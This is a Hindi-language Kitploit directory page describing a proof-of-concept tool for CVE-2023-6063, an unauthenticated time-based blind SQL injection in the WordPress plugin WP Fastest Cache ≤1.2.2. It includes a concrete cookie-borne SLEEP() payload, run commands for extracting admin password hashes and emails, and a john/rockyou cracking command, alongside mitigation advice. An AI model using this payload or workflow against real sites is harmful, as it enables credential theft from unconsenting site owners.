Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-6063-PoC — CVE-2023-6063 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, जो WP Fastest Cache ≤1.2.2 में एक समय-आधारित ब्लाइंड SQL इंजेक्शन कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/incommatose/cve-2023-6063-poc
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

CVE-2023-6063 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, जो WP Fastest Cache ≤1.2.2 में एक समय-आधारित ब्लाइंड SQL इंजेक्शन कमजोरी है।

रिपॉजिटरी देखें
21391 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6063 के लिए PoC: WP Fastest Cache 1.2.2 अप्रमाणित ब्लाइंड SQL इंजेक्शन

Static Badge Static Badge Static Badge

CVE-2023-6063 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, WP Fastest Cache ≤1.2.2 में एक समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता। wordpress_logged_in कुकी का दुरुपयोग करके wp_users तालिका से हैश किए गए पासवर्ड (user_pass) और ईमेल (user_email) निकालता है।

विशेषताएँ

  • SLEEP() विलंब के माध्यम से समय-आधारित डेटा निष्कर्षण (वर्ण-दर-वर्ण)।
  • कस्टम कुकीज़, लक्ष्य उपयोगकर्ता नाम और हैश सत्यापन का समर्थन करता है।

यह स्क्रिप्ट निकालता है:

  • ☑️ WordPress पासवर्ड हैश (MD5/PHPass)।
  • ☑️ संबंधित ईमेल पते।
  • लचीले परीक्षण के लिए CLI तर्क (--just-hash, --just-email, --debug)।

उपयोग

निर्भरताएँ स्थापित करें (यदि स्थापित नहीं हैं):

root@kitploit:~
pip install -r requirements.txt

मूल उपयोग:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

पूर्ण विकल्प:

root@kitploit:~
  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user

💻 डेमो

यह व्यवस्थापक उपयोगकर्ता के लिए एक डेमो है

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

जब हैश किए गए पासवर्ड लीक हो जाते हैं, तो यदि पासवर्ड असुरक्षित है तो इसे PHPass एल्गोरिदम से डिक्रिप्ट करने के लिए john या hashcat का उपयोग करें।

John उदाहरण:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ तकनीकी विवरण

📖 भेद्यता विवरण

WP Fastest Cache प्लगइन (≤1.2.2) WordPress के लिए wordpress_logged_in कुकी के माध्यम से एक अप्रमाणित ब्लाइंड SQL इंजेक्शन के लिए असुरक्षित है। हमलावर SQL क्वेरी में समय-आधारित विलंब (SLEEP()) का लाभ उठाकर wp_users तालिका से संवेदनशील डेटा (जैसे, पासवर्ड हैश, ईमेल पते) निकालने के लिए इस दोष का शोषण कर सकते हैं।

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 चेतावनी: इस जानकारी का उपयोग केवल उचित प्राधिकरण के साथ नैतिक सुरक्षा परीक्षण के लिए करें। अनधिकृत शोषण अवैध है।

  • CVE ID: CVE-2023-6063
  • भेद्यता स्कोर: 7.5 (उच्च)
  • भेद्यता प्रकार: SQL इंजेक्शन (ब्लाइंड, समय-आधारित)
  • प्रभावित सॉफ़्टवेयर: WP Fastest Cache (WordPress प्लगइन) ≤ v1.2.2

🔍 हमला वेक्टर

  • शोषण क्षमता: दूरस्थ (कोई प्रमाणीकरण आवश्यक नहीं)
  • हमले की जटिलता: कम (तैयार HTTP अनुरोधों के माध्यम से शोषण योग्य)

🔥 प्रभाव:

  • गोपनीयता: उच्च (व्यवस्थापक क्रेडेंशियल लीक करता है)
  • अखंडता: कोई नहीं
  • उपलब्धता: कोई नहीं

📌 प्रभावित संस्करण

  • WP Fastest Cache संस्करण ≤1.2.2

🛡️ शमन

WP Fastest Cache को संस्करण >1.2.2 में अपग्रेड करें।

  • WP Fastest Cache v1.2.3 या बाद में अपग्रेड करें।
  • कुकीज़ में SQLi पेलोड को ब्लॉक करने के लिए WAF नियम लागू करें।
  • यदि उपयोग न हो तो प्लगइन अक्षम करें।

📚 संदर्भ

  • NIST NVD Entry
  • WordPress Plugin Advisory
  • CVE Details

⚖️ कानूनी

  • यह स्क्रिप्ट शैक्षिक उद्देश्यों के लिए है। परीक्षण से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।
टूल डाउनलोड करें